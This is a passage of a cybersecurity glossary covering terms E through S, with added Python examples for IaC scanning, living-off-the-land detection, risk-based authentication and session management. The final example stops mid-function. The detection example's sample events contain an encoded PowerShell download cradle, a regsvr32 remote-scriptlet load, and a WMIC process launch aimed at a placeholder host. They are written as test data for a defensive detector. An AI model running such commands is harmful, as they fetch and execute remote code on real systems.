Encryption is the process of converting plaintext data into an unreadable ciphertext format using a cryptographic algorithm and key. Only authorized parties with the correct decryption key can convert the data back to its original readable form.

Endpoint Detection and Response

Security Operations

Endpoint Detection and Response (EDR) is a cybersecurity solution that continuously monitors and collects data from endpoints (laptops, desktops, servers, mobile devices) to detect, investigate, and respond to cyber threats in real time.

Edge Computing Security

Emerging Technology

Edge Computing Security addresses the protection of computing resources, data, and applications deployed at the network edge, close to data sources and end users, where traditional centralized security controls may not be available.

Endpoint Security

Security Operations

Endpoint Security is the practice of securing end-user devices such as laptops, desktops, mobile phones, and tablets from cyber threats through a combination of software, policies, and management controls.

Email Security

Data Protection

Email Security comprises the techniques and technologies used to protect email accounts, communications, and content from unauthorized access, phishing, malware, spam, and data loss through email channels.

Evil Twin Attack

Threats & Attacks

An Evil Twin Attack is a wireless attack where a threat actor sets up a fraudulent Wi-Fi access point with the same SSID as a legitimate network to trick users into connecting and intercept their traffic.

Evidence Preservation

Security Operations

Evidence Preservation is the process of protecting digital evidence from alteration, deletion, or degradation to maintain its integrity and admissibility for legal, regulatory, or investigative purposes.

Endpoint Privilege Management

Identity & Access

Endpoint Privilege Management (EPM) is a security technology that controls and monitors administrative privileges on endpoint devices, allowing standard users to elevate permissions for specific approved applications while maintaining least privilege.

F
6 terms

Firewall

Infrastructure

A firewall is a network security device or software that monitors and controls incoming and outgoing network traffic based on predetermined security rules. It establishes a barrier between trusted internal networks and untrusted external networks such as the internet.

Federated Identity

Identity & Access

Federated Identity is a system that allows users to use the same credentials to access resources across multiple independent organizations or domains by establishing trust relationships between identity providers.

Fileless Malware

Threats & Attacks

Fileless Malware is malicious activity that runs primarily in memory rather than as an executable written to disk, abusing legitimate system tools such as PowerShell, WMI, or Office macros to run its payload and persisting through mechanisms like registry entries or WMI event subscriptions. Because there is no conventional file to scan, it evades signature-based antivirus and has to be caught through behavioural and command-line monitoring.

FedRAMP

Risk & Compliance

FedRAMP (Federal Risk and Authorization Management Program) is a US government program that provides a standardized approach to security assessment, authorization, and continuous monitoring for cloud products and services used by federal agencies.

FISMA

Risk & Compliance

The Federal Information Security Management Act of 2002 (FISMA), updated by the Federal Information Security Modernization Act of 2014, is a US federal law that requires government agencies and their contractors to implement comprehensive information security programs based on risk management principles and NIST standards, notably the NIST SP 800-53 control catalog.

FERPA

Risk & Compliance

The Family Educational Rights and Privacy Act (FERPA) is a US federal law that protects the privacy of student education records and governs how educational institutions handle, disclose, and secure student data.

I
15 terms

Incident Response

Security Operations

Incident response is the organized approach to addressing and managing the aftermath of a security breach or cyberattack. The goal is to handle the situation in a way that limits damage, reduces recovery time and costs, and prevents future incidents.

Intrusion Detection System

Security Operations

An Intrusion Detection System (IDS) is a security tool that monitors network traffic or system activities for malicious behavior or policy violations. It alerts security teams when suspicious activity is detected, enabling rapid investigation and response.

Identity Governance

Identity & Access

Identity Governance is the policy-based framework for managing digital identities, ensuring users have appropriate access to resources, and maintaining compliance through regular access reviews and certifications.

Insider Threat

Threats & Attacks

An Insider Threat is a security risk posed by individuals within an organization, such as employees, contractors, or partners, who misuse their authorized access to harm the organization's data, systems, or operations.

ISO 27001

Risk & Compliance

ISO 27001 is an international standard for information security management systems (ISMS) that provides a systematic approach to managing sensitive company information through risk management processes and security controls.

Intrusion Prevention System (IPS)

Infrastructure

An Intrusion Prevention System (IPS) is an active network security technology that monitors network traffic, detects malicious activity, and automatically takes action to block or prevent threats in real time.

Incident Response Plan

Security Operations

An Incident Response Plan is a documented set of procedures and guidelines that defines how an organization will detect, respond to, and recover from security incidents to minimize damage and restore operations.

Infrastructure as Code Security

Cloud Security

Infrastructure as Code (IaC) Security is the practice of scanning and validating infrastructure-as-code templates (Terraform, CloudFormation, ARM) for security misconfigurations and policy violations before deployment.
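
An added example (not code from the glossary or from any scanner it might refer to) of the kind of check an IaC scanner runs before deployment: a small CloudFormation-style template is scanned for an admin port open to the internet, a public S3 bucket, and an IAM policy that grants every action on every resource. The template, the check names and the severity scheme are constructed for the demonstration.

```python
import json

# Constructed CloudFormation-style template, trimmed to the resources under test.
TEMPLATE = json.loads("""
{
  "Resources": {
    "AdminSG": {
      "Type": "AWS::EC2::SecurityGroup",
      "Properties": {
        "SecurityGroupIngress": [
          {"IpProtocol": "tcp", "FromPort": 22,  "ToPort": 22,  "CidrIp": "0.0.0.0/0"},
          {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "CidrIp": "0.0.0.0/0"}
        ]
      }
    },
    "LogsBucket": {
      "Type": "AWS::S3::Bucket",
      "Properties": {"AccessControl": "PublicRead"}
    },
    "DeployRole": {
      "Type": "AWS::IAM::Role",
      "Properties": {
        "Policies": [{
          "PolicyName": "deploy",
          "PolicyDocument": {"Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}
        }]
      }
    },
    "DataBucket": {
      "Type": "AWS::S3::Bucket",
      "Properties": {
        "PublicAccessBlockConfiguration": {"BlockPublicAcls": true, "BlockPublicPolicy": true,
                                           "IgnorePublicAcls": true, "RestrictPublicBuckets": true},
        "BucketEncryption": {"ServerSideEncryptionConfiguration": [
          {"ServerSideEncryptionByDefault": {"SSEAlgorithm": "aws:kms"}}]}
      }
    }
  }
}
""")

ADMIN_PORTS = {22, 3389}
PUBLIC_CIDRS = {"0.0.0.0/0", "::/0"}
PAB_KEYS = ("BlockPublicAcls", "BlockPublicPolicy", "IgnorePublicAcls", "RestrictPublicBuckets")


def _as_list(x):
    return x if isinstance(x, list) else [x]


def check_security_group(name, props):
    findings = []
    for rule in props.get("SecurityGroupIngress", []):
        cidr = rule.get("CidrIp") or rule.get("CidrIpv6")
        if cidr not in PUBLIC_CIDRS:
            continue
        lo, hi = int(rule.get("FromPort", 0)), int(rule.get("ToPort", 65535))
        if rule.get("IpProtocol") == "-1" or any(lo <= p <= hi for p in ADMIN_PORTS):
            findings.append((name, "HIGH", f"ports {lo}-{hi} open to {cidr}"))
    return findings


def check_s3_bucket(name, props):
    findings = []
    if props.get("AccessControl") in {"PublicRead", "PublicReadWrite"}:
        findings.append((name, "HIGH", f"bucket ACL is {props['AccessControl']}"))
    pab = props.get("PublicAccessBlockConfiguration", {})
    if not all(pab.get(k) is True for k in PAB_KEYS):
        findings.append((name, "MEDIUM", "public access block not fully enabled"))
    if "BucketEncryption" not in props:
        findings.append((name, "MEDIUM", "no default server-side encryption"))
    return findings


def check_iam_role(name, props):
    """Least-privilege check: Allow with Action:* on Resource:* is full account admin."""
    findings = []
    for policy in props.get("Policies", []):
        for stmt in _as_list(policy.get("PolicyDocument", {}).get("Statement", [])):
            if stmt.get("Effect") != "Allow":
                continue
            if "*" in _as_list(stmt.get("Action", [])) and "*" in _as_list(stmt.get("Resource", [])):
                findings.append((name, "HIGH", f"policy {policy.get('PolicyName')!r} grants Action:* on Resource:*"))
    return findings


CHECKS = {
    "AWS::EC2::SecurityGroup": check_security_group,
    "AWS::S3::Bucket": check_s3_bucket,
    "AWS::IAM::Role": check_iam_role,
}


def scan(template):
    """Return (resource, severity, message) for every failed check."""
    findings = []
    for name, res in template.get("Resources", {}).items():
        check = CHECKS.get(res.get("Type"))
        if check:
            findings.extend(check(name, res.get("Properties", {})))
    return findings


def gate(template, fail_on="HIGH") -> bool:
    """CI gate: True only when no finding of the blocking severity is present."""
    return not any(sev == fail_on for _, sev, _ in scan(template))


if __name__ == "__main__":
    for resource, severity, message in scan(TEMPLATE):
        print(f"{severity:6} {resource}: {message}")
    print("deployable:", gate(TEMPLATE))
```

Running the scan in the pull-request pipeline, with `gate()` failing the build on HIGH findings, is what turns the definition above into an enforced control: the misconfiguration is rejected before any resource exists.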

Interactive Application Security Testing (IAST)

Application Security

Interactive Application Security Testing (IAST) combines elements of SAST and DAST by using agents instrumented within the application to analyze code behavior during runtime testing, providing accurate vulnerability detection with low false positives.

IoT Security

Emerging Technology

IoT Security encompasses the strategies, technologies, and practices for protecting Internet of Things devices and networks from cyber threats, addressing the unique challenges of resource-constrained, interconnected devices.

ICS Security

Emerging Technology

Industrial Control System (ICS) Security focuses on protecting the computers, networks, and control systems that manage industrial processes in sectors such as energy, water, manufacturing, and transportation.

Identity and Access Management (IAM)

Identity & Access

Identity and Access Management (IAM) is the framework of policies, processes, and technologies that manages digital identities and controls user access to critical information and systems across an organization.

Information Security Management System

Risk & Compliance

An Information Security Management System (ISMS) is a systematic approach to managing sensitive company information through policies, procedures, technical controls, and continuous improvement frameworks, typically aligned with ISO 27001.

Immutable Infrastructure

Cloud Security

Immutable Infrastructure is a deployment paradigm where servers and components are never modified after deployment; instead, they are replaced entirely when updates are needed, reducing configuration drift and improving security consistency.

Identity Threat Detection and Response

Identity & Access

Identity Threat Detection and Response (ITDR) is a security discipline focused on detecting and responding to threats targeting identity systems, including compromised credentials, privilege abuse, and identity infrastructure attacks.

L
7 terms

LDAP

Identity & Access

Lightweight Directory Access Protocol (LDAP) is an open protocol used to access and manage distributed directory information services, commonly used for centralized authentication and storing user account information.

Logic Bomb

Threats & Attacks

A Logic Bomb is malicious code deliberately inserted into a software system that triggers a harmful function when specific conditions are met, such as a particular date, user action, or system event.

Load Balancer

Infrastructure

A Load Balancer is a device or software that distributes incoming network traffic across multiple servers to ensure no single server bears too much demand, improving availability, reliability, and performance of applications.

Least Privilege

Identity & Access

The Principle of Least Privilege is a security concept requiring that users, applications, and systems are granted only the minimum level of access necessary to perform their required functions, reducing the potential impact of security breaches.

LGPD

Risk & Compliance

The Lei Geral de Proteção de Dados (LGPD) is Brazil's comprehensive data protection law that regulates the processing of personal data, granting data subjects rights similar to those under the European GDPR.

Living Off The Land

Threats & Attacks

Living Off The Land (LOTL) refers to attacker techniques that use legitimate system tools and processes already present in the target environment to carry out malicious activities, making detection significantly more difficult.
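
Detection logic for the living-off-the-land and fileless tradecraft described in this entry and in the Fileless Malware entry (an added example, not code from the glossary or any EDR product). It scores process-creation events for encoded or hidden PowerShell, download-and-execute cradles, Office applications spawning shells, and abuse of WMIC, regsvr32, mshta and rundll32. The five events are constructed to resemble Sysmon Event ID 1 fields and are not real telemetry; the IP address is from the documentation range.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
CRADLE_RE = re.compile(r"\biex\b|invoke-expression|downloadstring|downloadfile|net\.webclient|invoke-webrequest")
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events (not real telemetry).
EVENTS = [
    {"parent": "explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"parent": "WINWORD.EXE", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"parent": "cmd.exe", "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": "wmic process call create \"rundll32.exe C:\\Users\\Public\\x.dll,Start\""},
    {"parent": "explorer.exe", "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://203.0.113.5/s.sct scrobj.dll"},
    {"parent": "services.exe", "image": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
]


def decode_encoded_command(cmdline: str) -> str:
    """Recover the script hidden behind -enc / -EncodedCommand; empty string if none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(event: dict) -> dict:
    """Score one process-creation event; the decoded script is included for the analyst."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"].lower()
    decoded = decode_encoded_command(event["cmdline"]) if image in ("powershell.exe", "pwsh.exe") else ""
    haystack = cmd + " " + decoded.lower()   # match on what will actually run, not just the wrapper
    hits = []

    if image in ("powershell.exe", "pwsh.exe"):
        if decoded:
            hits.append("encoded command")
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd):
            hits.append("hidden window")
        if CRADLE_RE.search(haystack):
            hits.append("download-and-execute cradle")
        if parent in OFFICE_PARENTS:
            hits.append(f"spawned by Office application {parent}")
    elif image == "wmic.exe" and "process call create" in cmd:
        hits.append("WMI used to launch a process")
    elif image == "regsvr32.exe" and re.search(r"/i:https?://", cmd):
        hits.append("regsvr32 loading a scriptlet from a URL")
    elif image == "mshta.exe" and re.search(r"https?://|javascript:|vbscript:", cmd):
        hits.append("mshta running remote or inline script")
    elif image == "rundll32.exe" and "javascript:" in cmd:
        hits.append("rundll32 executing JavaScript")

    severity = "high" if len(hits) >= 2 else "medium" if hits else "none"
    return {"image": image, "severity": severity, "hits": hits, "decoded": decoded}


if __name__ == "__main__":
    for event in EVENTS:
        result = analyze(event)
        if result["severity"] != "none":
            print(result["severity"].upper(), result["image"], result["hits"], result["decoded"] or "")
```

The legitimate backup script in the first event is not flagged even though it uses `-ExecutionPolicy Bypass`, while the Word-spawned, hidden, encoded download cradle scores four indicators; decoding the `-enc` argument before matching is what makes the cradle visible at all, since the raw command line contains only base64.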

Lateral Movement

Threats & Attacks

Lateral Movement refers to the techniques attackers use to progressively move through a network after initial compromise, seeking to expand their access to additional systems, accounts, and sensitive data.

M
14 terms

Malware

Threats & Attacks

Malware (malicious software) is any software intentionally designed to cause damage to a computer, server, client, or network. Common types include viruses, worms, trojans, ransomware, spyware, adware, and rootkits.

Multi-Factor Authentication

Identity & Access

Multi-Factor Authentication (MFA) is a security method that requires users to present two or more verification factors from different categories to gain access to a resource: something you know (password or PIN), something you have (hardware token, authenticator app, or security key), and something you are (biometrics). Factors are not equally strong: SMS codes and push approvals can be phished or worn down by prompt bombing, whereas FIDO2/WebAuthn security keys bind the credential to the legitimate site and resist phishing.

Man-in-the-Middle Attack

Threats & Attacks

A Man-in-the-Middle (MitM) attack is a cyberattack where an attacker secretly intercepts and potentially alters communications between two parties who believe they are communicating directly with each other.

Multi-Cloud Security

Cloud Security

Multi-Cloud Security is the practice of maintaining consistent security policies, controls, and visibility across multiple cloud service providers, addressing the complexity of managing security in heterogeneous cloud environments.

MITRE ATT&CK

Security Operations

MITRE ATT&CK is a globally accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations, used for threat modeling, detection engineering, and security assessment.

Managed Detection and Response

Security Operations

Managed Detection and Response (MDR) is a cybersecurity service that combines technology and human expertise to perform threat monitoring, detection, and response on behalf of organizations that lack in-house security operations capabilities.

Micro-Segmentation

Infrastructure

Micro-Segmentation is a security technique that creates fine-grained security zones around individual workloads or applications, enforcing strict access policies that prevent lateral movement even within the same network segment.

Malware Analysis

Security Operations

Malware Analysis is the process of studying and dissecting malicious software to understand its behavior, origin, capabilities, and impact, enabling security teams to develop detection signatures, containment strategies, and prevention measures.

Mobile Device Management

Infrastructure

Mobile Device Management (MDM) is a security technology that enables organizations to monitor, manage, and secure employees' mobile devices such as smartphones, tablets, and laptops from a centralized console.

Mobile Application Security

Application Security

Mobile Application Security encompasses the practices and technologies used to protect mobile applications from reverse engineering, tampering, data leakage, and exploitation on iOS and Android platforms.

Memory Forensics

Security Operations

Memory Forensics is the analysis of a computer's volatile memory (RAM) to recover artifacts such as running processes, network connections, encryption keys, and malware that may not be present on disk.

Model Poisoning

Emerging Technology

Model Poisoning is an attack where malicious actors manipulate the training data or model parameters of a machine learning system to introduce backdoors, degrade performance, or bias the model's outputs for their benefit.

Mean Time to Detect

Security Operations

Mean Time to Detect (MTTD) is a key security metric that measures the average time it takes for an organization to identify a security threat or breach from the moment it occurs until it is discovered.

Mean Time to Respond

Security Operations

Mean Time to Respond (MTTR) is a security metric measuring the average time from when a security incident is detected until it is fully contained and remediated, reflecting the efficiency of incident response capabilities. The same acronym is used in IT operations for mean time to recovery or repair, so state which is meant when reporting it.

N
6 terms

Network Security

Infrastructure

Network security encompasses the policies, practices, and technologies designed to protect the integrity, confidentiality, and accessibility of computer networks and data. It includes both hardware and software solutions that defend against unauthorized access and cyber threats.

NIST Cybersecurity Framework

Risk & Compliance

The NIST Cybersecurity Framework is a voluntary set of guidelines and best practices developed by the National Institute of Standards and Technology to help organizations manage and reduce cybersecurity risk. Version 2.0 (2024) organizes its outcomes into six core functions: Govern, Identify, Protect, Detect, Respond, and Recover; earlier versions had the last five only.

Next-Generation Firewall

Infrastructure

A Next-Generation Firewall (NGFW) is an advanced network security device that combines traditional firewall capabilities with additional features like application awareness, intrusion prevention, threat intelligence, and deep packet inspection.

Network Segmentation

Infrastructure

Network Segmentation is the practice of dividing a computer network into smaller subnetworks to improve security by limiting lateral movement, containing breaches, and controlling traffic flow between segments.

Network Access Control (NAC)

Infrastructure

Network Access Control (NAC) is a security approach that enforces policies for devices attempting to connect to a network, verifying identity, health, and compliance before granting appropriate access levels.

Network Traffic Analysis

Security Operations

Network Traffic Analysis (NTA) is the process of monitoring network communications to detect anomalies, threats, and performance issues by analyzing patterns, protocols, and behaviors in network flow data and packet captures.

P
19 terms

Penetration Testing

Assessment & Testing

Penetration testing (pen testing) is a simulated cyberattack against your computer system, network, or web application to identify exploitable vulnerabilities. Ethical hackers use the same tools and techniques as malicious attackers to find weaknesses before they can be exploited.

Phishing

Threats & Attacks

Phishing is a social engineering attack where cybercriminals send fraudulent communications, typically emails, that appear to come from a trusted source. The goal is to trick recipients into revealing sensitive information, clicking malicious links, or downloading malware.

Privileged Access Management

Identity & Access

Privileged Access Management (PAM) is a cybersecurity discipline that secures, controls, and monitors access for privileged accounts that have elevated permissions to critical systems and data.

Password Policy

Identity & Access

A Password Policy is a set of rules that defines requirements for creating, managing, and protecting passwords, including minimum length, screening against breached or common passwords, lockout and MFA requirements, and storage standards (salted, slow hashes such as Argon2 or bcrypt). Current NIST guidance (SP 800-63B) favours length and breach-list screening over composition rules and mandatory periodic rotation, which push users toward predictable patterns.

PCI DSS

Risk & Compliance

PCI DSS (Payment Card Industry Data Security Standard) is a set of security standards designed to ensure that all organizations that accept, process, store, or transmit credit card information maintain a secure environment.

PIPEDA

Risk & Compliance

PIPEDA (Personal Information Protection and Electronic Documents Act) is Canada's federal privacy law governing how private-sector organizations collect, use, and disclose personal information in the course of commercial activities.

Privacy Impact Assessment

Risk & Compliance

A Privacy Impact Assessment (PIA) is a systematic process for evaluating how a project, system, or process collects, uses, and protects personal information, identifying privacy risks and recommending mitigations.

Proxy Server

Infrastructure

A Proxy Server is an intermediary server that sits between client devices and the internet, forwarding requests on behalf of clients while providing anonymity, caching, content filtering, and security benefits.

Patch Management

Security Operations

Patch Management is the process of identifying, acquiring, testing, and deploying software updates and security patches across an organization's systems to fix vulnerabilities and improve functionality.

Purple Team

Security Operations

A Purple Team is a collaborative security approach where red team (offensive) and blue team (defensive) personnel work together to maximize the effectiveness of security testing by sharing knowledge, techniques, and findings in real time.

Penetration Testing Methodology

Security Operations

Penetration Testing Methodology refers to the structured frameworks and standards that guide how penetration tests are planned, executed, and reported, ensuring comprehensive and repeatable security assessments.

Penetration Testing as a Service (PTaaS)

Assessment & Testing

Penetration Testing as a Service (PTaaS) is a modern delivery model that combines continuous automated scanning with on-demand expert-led penetration testing, providing organizations with ongoing security validation through a cloud-based platform.

Phishing Simulation

Assessment & Testing

Phishing Simulation is a security training exercise that sends realistic but benign phishing emails to employees to test their ability to recognize and report phishing attempts, measuring organizational resilience to social engineering.

Prompt Injection

Emerging Technology

Prompt Injection is an attack against applications built on AI language models in which attacker-crafted text overrides the model's intended instructions. It can be direct (typed by the user) or indirect (hidden in a web page, document, or email the model is asked to process), and can cause the model to reveal sensitive data, generate harmful content, or misuse the tools and actions connected to it.

Pass-the-Hash Attack

Threats & Attacks

A Pass-the-Hash Attack is a technique where an attacker who has obtained a user's NTLM password hash (for example from LSASS memory or the SAM database) presents it directly to authenticate to other Windows systems, without needing to crack or know the plaintext password. It is a common lateral movement method and is mitigated by restricting NTLM, protecting LSASS, and eliminating shared local administrator passwords.

Privilege Escalation

Threats & Attacks

Privilege Escalation is the exploitation of a bug, design flaw, or configuration oversight in an operating system or application to gain elevated access to resources that are normally protected from unprivileged users.

Physical Security

Infrastructure

Physical Security encompasses the measures designed to protect personnel, hardware, software, networks, and data from physical actions and events that could cause serious loss or damage to an organization.

Privacy by Design

Data Protection

Privacy by Design is a framework for embedding privacy into the design specifications of technologies, business practices, and physical infrastructures, ensuring that privacy protections are built in from the outset rather than added as an afterthought.

Payment Card Industry

Risk & Compliance

The Payment Card Industry (PCI) encompasses the organizations, technologies, and standards that govern the secure processing, storage, and transmission of credit card data, primarily defined by the PCI Security Standards Council.

R
12 terms

Ransomware

Threats & Attacks

Ransomware is a type of malware that encrypts a victim's files or locks them out of their systems, then demands a ransom payment in exchange for the decryption key. Modern ransomware often includes double extortion, where attackers also threaten to leak stolen data.

Red Team

Assessment & Testing

A red team is a group of security professionals who simulate real-world attacks against an organization to test its defenses. Unlike penetration testing, red team exercises assess the entire security posture including people, processes, and technology across an extended engagement.

Risk Assessment

Risk & Compliance

A risk assessment is the systematic process of identifying, analyzing, and evaluating cybersecurity risks to an organization. It determines the likelihood and potential impact of threats, helping prioritize security investments and mitigation strategies.

Rootkit

Threats & Attacks

A Rootkit is a collection of malicious software tools that provides privileged access to a computer while actively concealing its presence from users, administrators, and security software.

Risk Management

Risk & Compliance

Risk Management is the ongoing process of identifying, assessing, prioritizing, and mitigating cybersecurity risks to reduce their potential impact on an organization's operations, assets, and reputation.

Reverse Proxy

Infrastructure

A Reverse Proxy is a server that sits in front of web servers and forwards client requests to the appropriate backend server, providing load balancing, TLS termination, caching, and an additional layer of security.

RSA Encryption

Data Protection

RSA is an asymmetric encryption algorithm built on the difficulty of factoring the product of two large primes: the public key encrypts or verifies signatures, and the mathematically related private key decrypts or signs. It underpins digital signatures and certificates in TLS; older TLS versions also used RSA for key exchange, but TLS 1.3 dropped RSA key transport in favour of ephemeral Diffie-Hellman for forward secrecy. Secure use requires padding (OAEP for encryption, PSS for signatures) and keys of at least 2048 bits.

Right to be Forgotten

Data Protection

The Right to be Forgotten is a data privacy concept, codified in GDPR as the right to erasure, that allows individuals to request the deletion of their personal data from an organization's records under certain circumstances.

Runtime Application Self-Protection (RASP)

Application Security

Runtime Application Self-Protection (RASP) is a security technology embedded in an application's runtime that detects and blocks attacks in real time by analysing the application's behaviour and request context from inside the running process, rather than from a network perimeter device.

Ransomware Response

Security Operations

Ransomware Response is the structured approach to detecting, containing, eradicating, and recovering from a ransomware attack, including decision-making about ransom payments and restoration from backups.

Reverse Shell

Threats & Attacks

A Reverse Shell is a type of shell session initiated from a compromised target machine back to an attacker's command-and-control server, bypassing inbound firewall restrictions that would block direct connections to the target.

Risk-Based Authentication

Identity & Access

Risk-Based Authentication (RBA) is an adaptive security mechanism that adjusts authentication requirements in real time based on the assessed risk level of a login attempt, requiring stronger verification for suspicious activity.
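
A minimal risk engine of the kind the definition describes (an added example, not code from the glossary or any identity product). It scores a login attempt on an unknown device, an unusual country, impossible travel since the last login, and a burst of failed passwords, then maps the score to allow, require MFA, or block. The user profile, the three attempts, the weights and the thresholds are all constructed for the demonstration.

```python
import math
from dataclasses import dataclass
from typing import Optional


@dataclass
class LoginAttempt:
    user: str
    ts: float              # unix time of the attempt
    ip_country: str        # from IP geolocation
    lat: float
    lon: float
    device_id: str         # device cookie or fingerprint
    recent_failures: int   # failed password attempts on this account in the last hour


@dataclass
class UserProfile:
    known_devices: set
    usual_countries: set
    last_login: Optional[LoginAttempt] = None


MAX_PLAUSIBLE_KMH = 1000.0   # faster than a commercial flight means impossible travel


def haversine_km(lat1, lon1, lat2, lon2) -> float:
    """Great-circle distance between two points on Earth."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlmb = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def risk_score(attempt: LoginAttempt, profile: UserProfile):
    """Additive score with a human-readable reason per signal (weights are illustrative)."""
    score, reasons = 0, []
    if attempt.device_id not in profile.known_devices:
        score += 30
        reasons.append("unknown device")
    if attempt.ip_country not in profile.usual_countries:
        score += 25
        reasons.append(f"unusual country {attempt.ip_country}")
    last = profile.last_login
    if last is not None:
        hours = max((attempt.ts - last.ts) / 3600.0, 1e-6)
        km = haversine_km(last.lat, last.lon, attempt.lat, attempt.lon)
        if km / hours > MAX_PLAUSIBLE_KMH:
            score += 40
            reasons.append(f"impossible travel: {km:.0f} km in {hours:.1f} h")
    if attempt.recent_failures >= 5:
        score += 30
        reasons.append("brute-force or password-spraying pattern")
    return score, reasons


def decide(attempt: LoginAttempt, profile: UserProfile):
    """Step-up policy: low risk passes, medium risk must complete MFA, high risk is refused."""
    score, reasons = risk_score(attempt, profile)
    if score >= 70:
        action = "block"
    elif score >= 30:
        action = "require_mfa"
    else:
        action = "allow"
    return action, score, reasons


# Constructed history: alice normally logs in from Toronto on her laptop.
T0 = 1_700_000_000.0
PROFILE = UserProfile(
    known_devices={"dev-laptop-1"},
    usual_countries={"CA"},
    last_login=LoginAttempt("alice", T0, "CA", 43.65, -79.38, "dev-laptop-1", 0),
)
ATTEMPT_ROUTINE = LoginAttempt("alice", T0 + 1800, "CA", 43.65, -79.38, "dev-laptop-1", 0)
ATTEMPT_NEW_DEVICE = LoginAttempt("alice", T0 + 3600, "CA", 43.65, -79.38, "dev-phone-9", 0)
ATTEMPT_TRAVEL = LoginAttempt("alice", T0 + 7200, "DE", 50.11, 8.68, "dev-unknown", 6)  # Frankfurt, 2 h later

if __name__ == "__main__":
    for attempt in (ATTEMPT_ROUTINE, ATTEMPT_NEW_DEVICE, ATTEMPT_TRAVEL):
        print(decide(attempt, PROFILE))
```

The routine login passes silently, the new phone triggers an MFA prompt, and the login from Frankfurt two hours after one from Toronto, on an unknown device and after six failed passwords, is refused outright. Recording each decision's reasons alongside the action is what lets analysts tune the weights from real outcomes rather than guesswork.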

S
39 terms

SIEM

Security Operations

Security Information and Event Management (SIEM) is a technology solution that collects, aggregates, and analyzes security event data from across an organization's IT infrastructure. SIEM provides real-time monitoring, threat detection, correlation of security events, and compliance reporting.

Single Sign-On

Identity & Access

Single Sign-On (SSO) is an authentication method that allows users to access multiple applications and services with one set of login credentials. SSO improves user experience, reduces password fatigue, and centralizes authentication management. Because one credential unlocks everything, the identity provider becomes a high-value target and should be protected with phishing-resistant MFA and session monitoring.

Social Engineering

Threats & Attacks

Social engineering is a manipulation technique that exploits human psychology to trick people into making security mistakes or giving away sensitive information. It is the human element of cybersecurity attacks and often serves as the initial vector for more complex attacks.

SAML

Identity & Access

Security Assertion Markup Language (SAML) is an XML-based open standard for exchanging authentication and authorization data between an identity provider and a service provider, enabling single sign-on across domains.

Session Management

Identity & Access

Session Management is the process of securely handling user sessions from login to logout, including generating session tokens, maintaining session state, enforcing timeouts, and preventing session hijacking attacks.
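
An added example (not code from the glossary) of a server-side session store that applies the controls listed above: tokens from the OS CSPRNG, only a digest stored server-side, a fresh identifier issued at login to defeat session fixation, idle and absolute timeouts, and server-side revocation. The cookie attributes mentioned in the comments and the `ManualClock` used to exercise expiry are assumptions made for the demonstration.

```python
import hashlib
import secrets
import time

SESSION_IDLE_SECONDS = 15 * 60         # expire after 15 minutes without activity
SESSION_MAX_SECONDS = 8 * 60 * 60      # absolute lifetime, however active the user is


class ManualClock:
    """Injectable clock so expiry can be exercised without sleeping."""

    def __init__(self, start: float = 1_700_000_000.0):
        self.now = start

    def advance(self, seconds: float) -> None:
        self.now += seconds

    def __call__(self) -> float:
        return self.now


class SessionStore:
    """Server-side session store.

    Assumed deployment (not from the page): the token travels in an HttpOnly, Secure,
    SameSite cookie, and only a digest of it is kept here so a leaked store does not
    hand out usable sessions.
    """

    def __init__(self, clock=time.time):
        self.clock = clock
        self._sessions = {}   # sha256(token) -> {"user", "created", "last_seen"}

    @staticmethod
    def _key(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def create(self, user: str) -> str:
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG, never random.random()
        now = self.clock()
        self._sessions[self._key(token)] = {"user": user, "created": now, "last_seen": now}
        return token

    def login(self, user: str, pre_login_token=None) -> str:
        """Issue a brand-new identifier on authentication; keeping the pre-login one
        is the session fixation bug."""
        if pre_login_token is not None:
            self.revoke(pre_login_token)
        return self.create(user)

    def lookup(self, token: str):
        """Return the session's user, or None if the token is unknown or expired."""
        key = self._key(token)
        sess = self._sessions.get(key)
        if sess is None:
            return None
        now = self.clock()
        if now - sess["last_seen"] > SESSION_IDLE_SECONDS or now - sess["created"] > SESSION_MAX_SECONDS:
            self._sessions.pop(key, None)   # expire server-side; never rely on the client to forget
            return None
        sess["last_seen"] = now
        return sess["user"]

    def revoke(self, token: str) -> None:
        """Logout: invalidate on the server, not merely by clearing the cookie."""
        self._sessions.pop(self._key(token), None)

    def revoke_all(self, user: str) -> int:
        """Invalidate every session of a user, e.g. after a password change or compromise."""
        doomed = [k for k, s in self._sessions.items() if s["user"] == user]
        for k in doomed:
            del self._sessions[k]
        return len(doomed)


if __name__ == "__main__":
    clock = ManualClock()
    store = SessionStore(clock=clock)
    pre = store.create("anonymous")
    tok = store.login("alice", pre_login_token=pre)
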